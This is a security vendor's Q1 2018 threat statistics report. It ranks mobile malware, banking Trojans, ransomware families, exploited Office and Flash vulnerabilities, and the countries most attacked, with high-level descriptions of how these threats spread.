"![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2014/08/08080813/quarter_threat.jpg)\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. Incidentally, Egat.d is a pared-down version of Zebt.a, both have the same creators.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications, that it can only be compared to amount of Adobe Flash vulnerabilities found in the past. But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, it was [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n \n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \nExcluded are countries with relatively few Kaspersky Lab' product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32. Zbot | 28.0% | \n2 | Nymaim | Trojan.Win32. Nymaim | 20.3% | \n3 | Caphaw | Backdoor.Win32. Caphaw | 15.2% | \n4 | SpyEye | Backdoor.Win32. SpyEye | 11.9% | \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% | \n6 | Emotet | Backdoor.Win32. Emotet | 2.4% | \n7 | Neurevt | Trojan.Win32. Neurevt | 2.3% | \n8 | Shiz | Backdoor.Win32. Shiz | 2.1% | \n9 | Gozi | Trojan.Win32. Gozi | 1.9% | \n10 | ZAccess | Backdoor.Win32. ZAccess | 1.3% | \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.__ \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affilate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 | \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 | \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 | \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 | \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 | \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 | \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112 **attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that 